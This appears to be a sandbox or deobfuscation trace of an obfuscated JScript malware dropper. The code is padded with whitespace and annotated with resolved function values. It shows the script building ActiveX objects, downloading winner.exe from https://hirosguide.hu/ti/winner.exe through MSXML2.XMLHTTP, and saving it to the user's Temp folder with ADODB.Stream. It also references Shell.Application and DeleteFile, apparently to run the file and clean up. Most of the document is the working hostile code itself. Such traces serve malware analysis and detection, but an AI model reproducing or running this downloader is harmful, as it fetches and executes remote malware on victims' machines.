                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ "\xd48\x98\x8d\xb5\x90\xd6\xad\x90\x85\x92>S"
                                                                                                                                                                                                                                                                      • parseInt("\xd48\x98\x8d\xb5\x90\xd6\xad\x90\x85\x92>S") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3dc1(509,"3o8g") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ "\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7"
                                                                                                                                                                                                                                                                      • parseInt("\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3dc1(509,"3o8g") ➔ "GET"
                                                                                                                                                                                                                                                                      • parseInt("GET") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x31b8(498) ➔ "SaveToFile"
                                                                                                                                                                                                                                                                      • parseInt("SaveToFile") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x11be6c(168,"H9oj") ➔ "kfN("
                                                                                                                                                                                                                                                                      • _0x3cfdf4(504,"kfN(") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3cfdf4(513,"0zEZ") ➔ "\x92W\xf1\x19\xb7\xaa]g"
                                                                                                                                                                                                                                                                      • parseInt("\x92W\xf1\x19\xb7\xaa]g") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ "\xfax\x9a\x80\xd9\xc9o\xa4\x1a!\xab\x00l"
                                                                                                                                                                                                                                                                      • parseInt("\xfax\x9a\x80\xd9\xc9o\xa4\x1a!\xab\x00l") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x31b8(498) ➔ "W7mUrSkZ"
                                                                                                                                                                                                                                                                      • parseInt("W7mUrSkZ") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x11be6c(168,"H9oj") ➔ "kfN("
                                                                                                                                                                                                                                                                      • _0x3cfdf4(504,"kfN(") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3cfdf4(513,"0zEZ") ➔ "\x05@f\xa5\x90\xc7\xb1\x85"
                                                                                                                                                                                                                                                                      • parseInt("\x05@f\xa5\x90\xc7\xb1\x85") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3cfdf4(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                                                                                      • parseInt("t\xaf\xea\x12") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ "\xbc\x17\xf3\x14\xdb\xf3\xe4n"
                                                                                                                                                                                                                                                                      • parseInt("\xbc\x17\xf3\x14\xdb\xf3\xe4n") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x31b8(498) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                      • parseInt("2383633jjSiic") ➔ 2383633
                                                                                                                                                                                                                                                                      • _0x11be6c(168,"H9oj") ➔ "kfN("
                                                                                                                                                                                                                                                                      • _0x3cfdf4(504,"kfN(") ➔ "\xcad\xeb"
                                                                                                                                                                                                                                                                      • parseInt("\xcad\xeb") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x11be6c(206,"oC51") ➔ "Mmay"
                                                                                                                                                                                                                                                                      • _0x3cfdf4(511,"Mmay") ➔ undefined
                                                                                                                                                                                                                                                                      • parseInt("\x1cw55^\x01\xfc}\xdc\xe5C") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ "+\x00d\xa8\xfc\x9e\x08\x8c"
                                                                                                                                                                                                                                                                      • parseInt("+\x00d\xa8\xfc\x9e\x08\x8c") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x31b8(498) ➔ "Send"
                                                                                                                                                                                                                                                                      • parseInt("Send") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x11be6c(168,"H9oj") ➔ "kfN("
                                                                                                                                                                                                                                                                      • _0x3cfdf4(504,"kfN(") ➔ "wY%\xfdfC\xc3\xbe\x9aV\x86Z\xb6"
                                                                                                                                                                                                                                                                      • parseInt("wY%\xfdfC\xc3\xbe\x9aV\x86Z\xb6") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x11be6c(206,"oC51") ➔ "Mmay"
                                                                                                                                                                                                                                                                      • _0x3cfdf4(511,"Mmay") ➔ undefined
                                                                                                                                                                                                                                                                      • parseInt("5\xaf\x1e\xf6a") ➔ 5
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ undefined
                                                                                                                                                                                                                                                                      • parseInt("B\x1f\x0c\xcf o\x9e\xbc\x19B\x9c\xe3") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ undefined
                                                                                                                                                                                                                                                                      • parseInt("7iqMrNm") ➔ 7
                                                                                                                                                                                                                                                                      • _0x3cfdf4(509,"3o8g") ➔ "27782XEtVAz"
                                                                                                                                                                                                                                                                      • parseInt("27782XEtVAz") ➔ 27782
                                                                                                                                                                                                                                                                      • _0x31b8(498) ➔ "438285eiwTzG"
                                                                                                                                                                                                                                                                      • parseInt("438285eiwTzG") ➔ 438285
                                                                                                                                                                                                                                                                      • _0x11be6c(168,"H9oj") ➔ "kfN("
                                                                                                                                                                                                                                                                      • _0x3cfdf4(504,"kfN(") ➔ "16LidyHt"
                                                                                                                                                                                                                                                                      • parseInt("16LidyHt") ➔ 16
                                                                                                                                                                                                                                                                      • _0x11be6c(206,"oC51") ➔ "Mmay"
                                                                                                                                                                                                                                                                      • _0x3cfdf4(511,"Mmay") ➔ "285545VUltfC"
                                                                                                                                                                                                                                                                      • parseInt("285545VUltfC") ➔ 285545
                                                                                                                                                                                                                                                                      • _0x30bab5(187) ➔ "3rnQ"
                                                                                                                                                                                                                                                                      • _0x3cfdf4(500,"3rnQ") ➔ "1797552RzGxfG"
                                                                                                                                                                                                                                                                      • parseInt("1797552RzGxfG") ➔ 1797552
                                                                                                                                                                                                                                                                      • _0x31b8(493) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                      • parseInt("2383633jjSiic") ➔ 2383633
                                                                                                                                                                                                                                                                      • _0x31b8(501) ➔ "891608JWBVoS"
                                                                                                                                                                                                                                                                      • parseInt("891608JWBVoS") ➔ 891608
                                                                                                                                                                                                                                                                      • _0x30bab5(194) ➔ "cz*B"
                                                                                                                                                                                                                                                                      • _0x3cfdf4(519,"cz*B") ➔ "45obifie"
                                                                                                                                                                                                                                                                      • parseInt("45obifie") ➔ 45
                                                                                                                                                                                                                                                                      • _0x31b8(512) ➔ "12775480EBnljO"
                                                                                                                                                                                                                                                                      • parseInt("12775480EBnljO") ➔ 12775480
if ( _0x419b7e === _0x2c796b )
  break ;
else
  _0x136e36['push'] ( _0x136e36[_0x11be6c ( 0xbf, 'vv]U' ) ] ( ) );
}
catch ( _0x43e41f )
{
  _0x136e36[_0x11be6c ( 0x99, 'Pq8!' ) ] ( _0x136e36['shift'] ( ) );
                                                                                                                                                                                                                                                                                    • _0x11be6c(153,"Pq8!") ➔ "push"
}
}
} ( _0x4495, 0x46aac ) );
function _0x4495() {
                                                                                                                                                                                                                                                                                          • _0x4495() ➔ Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG
                                                                                                                                                                                                                                                                                          var _0x44a08c = _0x38e1, _0x15f00a = _0x10bd, _0x238569 = [ 'Shell.Application', _0x15f00a ( 0xa3 ), _0x15f00a ( 0xaf ), _0x44a08c ( 0xa5, 'nXvR' ), 'FvRdQKKo', 'cSoQW7HWyKGYW5pcGCokiSk7', '12775480EBnljO', _0x15f00a ( 0xcb ), _0x15f00a ( 0xd0 ), _0x15f00a ( 0xb3 ), _0x44a08c ( 0xd8, 'B5jQ' ), _0x44a08c ( 0xd1, 'L)v3' ), _0x15f00a ( 0xbd ), 'b8kDW4nLumkfwrG', _0x44a08c ( 0xa0, 'KzLL' ), _0x15f00a ( 0xa7 ), 'SaveToFile', _0x15f00a ( 0x9f ), _0x15f00a ( 0xac ), _0x15f00a ( 0xcc ), _0x15f00a ( 0xb2 ), _0x44a08c ( 0xba, 'Pq8!' ), _0x15f00a ( 0xd6 ), 'https://hirosguide.hu/ti/winner.exe', _0x15f00a ( 0xa9 ), _0x44a08c ( 0xc4, '2]Vf' ), _0x44a08c ( 0x9a, ']9d%' ), _0x15f00a ( 0xb5 ), _0x15f00a ( 0xa2 ), _0x44a08c ( 0xb0, 'uW23' ), _0x15f00a ( 0xd9 ), 'WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa', _0x15f00a ( 0x9c ), _0x15f00a ( 0xbc ) ];
                                                                                                                                                                                                                                                                                          • _0x15f00a(163) ➔ "ADODB.Stream"
                                                                                                                                                                                                                                                                                          • _0x15f00a(175) ➔ "pfOEWQ0"
                                                                                                                                                                                                                                                                                          • _0x44a08c(165,"nXvR") ➔ "vmkcW4hcIJeMubjeBCo9"
                                                                                                                                                                                                                                                                                          • _0x15f00a(203) ➔ "F8kCWOxdSH1PW4e"
                                                                                                                                                                                                                                                                                          • _0x15f00a(208) ➔ "W5BcVetcV8osW7zdW68"
                                                                                                                                                                                                                                                                                          • _0x15f00a(179) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                          • _0x44a08c(216,"B5jQ") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                          • _0x44a08c(209,"L)v3") ➔ "45obifie"
                                                                                                                                                                                                                                                                                          • _0x15f00a(189) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                          • _0x44a08c(160,"KzLL") ➔ "tHKTWPXJW6aHEvJcUYmH"
                                                                                                                                                                                                                                                                                          • _0x15f00a(167) ➔ "gM3dJZ48WOy8WOFdMsZdQCkaW7S"
                                                                                                                                                                                                                                                                                          • _0x15f00a(159) ➔ "W7mUrSkZ"
                                                                                                                                                                                                                                                                                          • _0x15f00a(172) ➔ "Type"
                                                                                                                                                                                                                                                                                          • _0x15f00a(204) ➔ "whGqWOWIpCkIW71DWQruaW"
                                                                                                                                                                                                                                                                                          • _0x15f00a(178) ➔ "dmoHW7v3BKGbW6/cMSoQpSk/"
                                                                                                                                                                                                                                                                                          • _0x44a08c(186,"Pq8!") ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                                          • _0x15f00a(214) ➔ "Send"
                                                                                                                                                                                                                                                                                          • _0x15f00a(169) ➔ "Open"
                                                                                                                                                                                                                                                                                          • _0x44a08c(196,"2]Vf") ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                          • _0x44a08c(154,"]9d%") ➔ "438285eiwTzG"
                                                                                                                                                                                                                                                                                          • _0x15f00a(181) ➔ "iCoWWQi"
                                                                                                                                                                                                                                                                                          • _0x15f00a(162) ➔ "WPZdJwWYW5RcT3RdGGGnlgBcSq"
                                                                                                                                                                                                                                                                                          • _0x44a08c(176,"uW23") ➔ "891608JWBVoS"
                                                                                                                                                                                                                                                                                          • _0x15f00a(217) ➔ "Close"
                                                                                                                                                                                                                                                                                          • _0x15f00a(156) ➔ "W5RcOGxcPSoyWO3dSqG"
                                                                                                                                                                                                                                                                                          • _0x15f00a(188) ➔ "tCk1WPiAW7/dOb3dQG"
return _0x4495 =
function () {
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ 12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7
                                                                                                                                                                                                                                                                                            return _0x238569;
                                                                                                                                                                                                                                                                                              }, _0x4495 ( );
                                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                                  var pOut = new ActiveXObject ( _0x406710 ( 0x1f7, _0x25fd55 ( 0xcf, 'uW23' ) ) ) ['GetSpecialFolder'] ( 0x2 ) + '\x5cwinner.exe', Object = WScript[_0x1f863f ( 0x203 ) ] ( _0x1f863f ( 0x206 ) );
                                                                                                                                                                                                                                                                                                  • _0x25fd55(207,"uW23") ➔ "du%R"
                                                                                                                                                                                                                                                                                                  • _0x406710(503,"du%R") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                                  • GetSpecialFolder(2) ➔ C:\Users\alfons\AppData\Local\Temp
                                                                                                                                                                                                                                                                                                  • _0x31b8(515) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                  • _0x31b8(518) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                                  • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                                                                                                                                                                                                                                                  function _0x31b8(_0x3868af, _0x4b1369) {
                                                                                                                                                                                                                                                                                                  • _0x31b8(498) ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                                  • _0x31b8(498) ➔ "W7mUrSkZ"
                                                                                                                                                                                                                                                                                                  • _0x31b8(498) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                                                  • _0x31b8(498) ➔ "Send"
                                                                                                                                                                                                                                                                                                  • _0x31b8(498) ➔ "438285eiwTzG"
                                                                                                                                                                                                                                                                                                  • _0x31b8(493) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                                                  • _0x31b8(501) ➔ "891608JWBVoS"
                                                                                                                                                                                                                                                                                                  • _0x31b8(512) ➔ "12775480EBnljO"
                                                                                                                                                                                                                                                                                                  • _0x31b8(515) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                  • _0x31b8(518) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                                  var _0x50e4f1 = _0x4495 ( );
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ 12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ 45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S
                                                                                                                                                                                                                                                                                                  return _0x31b8 =
                                                                                                                                                                                                                                                                                                    function (_0x1853fb, _0x4c628) {
                                                                                                                                                                                                                                                                                                    • _0x31b8(498,undefined) ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                                    • _0x31b8(498,undefined) ➔ "W7mUrSkZ"
                                                                                                                                                                                                                                                                                                    • _0x31b8(498,undefined) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                                                    • _0x31b8(498,undefined) ➔ "Send"
                                                                                                                                                                                                                                                                                                    • _0x31b8(498,undefined) ➔ "438285eiwTzG"
                                                                                                                                                                                                                                                                                                    • _0x31b8(493,undefined) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                                                    • _0x31b8(501,undefined) ➔ "891608JWBVoS"
                                                                                                                                                                                                                                                                                                    • _0x31b8(512,undefined) ➔ "12775480EBnljO"
                                                                                                                                                                                                                                                                                                    • _0x31b8(515,undefined) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                    • _0x31b8(518,undefined) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                                    _0x1853fb = _0x1853fb - 0x1e8;
                                                                                                                                                                                                                                                                                                      var _0x1cea82 = _0x50e4f1[_0x1853fb];
                                                                                                                                                                                                                                                                                                        return _0x1cea82;
                                                                                                                                                                                                                                                                                                          }, _0x31b8 ( _0x3868af, _0x4b1369 );
                                                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                                                              Object[_0x1f863f ( 0x1f0 ) ] ( _0x406710 ( 0x1f3, _0xfacb16 ( 0xab ) ), _0x1f863f ( 0x1ef ), ! [] ), Object[_0x1f863f ( 0x1ee ) ] ( );
                                                                                                                                                                                                                                                                                                              • _0x1f863f(496) ➔ "Open"
                                                                                                                                                                                                                                                                                                              • _0xfacb16(171) ➔ "3o8g"
                                                                                                                                                                                                                                                                                                              • _0x406710(499,"3o8g") ➔ "GET"
                                                                                                                                                                                                                                                                                                              • _0x1f863f(495) ➔ "https://hirosguide.hu/ti/winner.exe"
                                                                                                                                                                                                                                                                                                              • Open("GET","https://hirosguide.hu/ti/winner.exe",false) ➔ undefined
                                                                                                                                                                                                                                                                                                              • _0x1f863f(494) ➔ "Send"
                                                                                                                                                                                                                                                                                                              • Send() ➔ undefined
                                                                                                                                                                                                                                                                                                              156
                                                                                                                                                                                                                                                                                                              var Stream = WScript[_0x1f863f ( 0x203 ) ] ( _0x1f863f ( 0x1fb ) );
                                                                                                                                                                                                                                                                                                              • _0x1f863f(515) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                              • _0x1f863f(507) ➔ "ADODB.Stream"
                                                                                                                                                                                                                                                                                                              • Windows Script Host.CreateObject("ADODB.Stream") ➔
                                                                                                                                                                                                                                                                                                              157
                                                                                                                                                                                                                                                                                                              function _0x10bd(_0x11a177, _0x26656a) {
                                                                                                                                                                                                                                                                                                              • _0x10bd(202) ➔ "Open"
                                                                                                                                                                                                                                                                                                              • _0x10bd(202) ➔ "WPNdVhRcR8kzWQK"
                                                                                                                                                                                                                                                                                                              • _0x10bd(200) ➔ "rmkoj8oa"
                                                                                                                                                                                                                                                                                                              • _0x10bd(161) ➔ "cz*B"
                                                                                                                                                                                                                                                                                                              • _0x10bd(202) ➔ "3o8g"
                                                                                                                                                                                                                                                                                                              • _0x10bd(200) ➔ "Open"
                                                                                                                                                                                                                                                                                                              • _0x10bd(161) ➔ "W5ZdI13cMmk4B2fiW4xdTW"
                                                                                                                                                                                                                                                                                                              • _0x10bd(166) ➔ "35751wCkNjf"
                                                                                                                                                                                                                                                                                                              • _0x10bd(192) ➔ "172CBHuQO"
                                                                                                                                                                                                                                                                                                              • _0x10bd(215) ➔ "W4eBm1u"
                                                                                                                                                                                                                                                                                                              158
                                                                                                                                                                                                                                                                                                              var _0x33f15e = _0x33f1 ( );
  return _0x10bd =
    function (_0x10bd08, _0x516731) {
    • _0x10bd(202,undefined) ➔ "Open"
    • _0x10bd(202,undefined) ➔ "WPNdVhRcR8kzWQK"
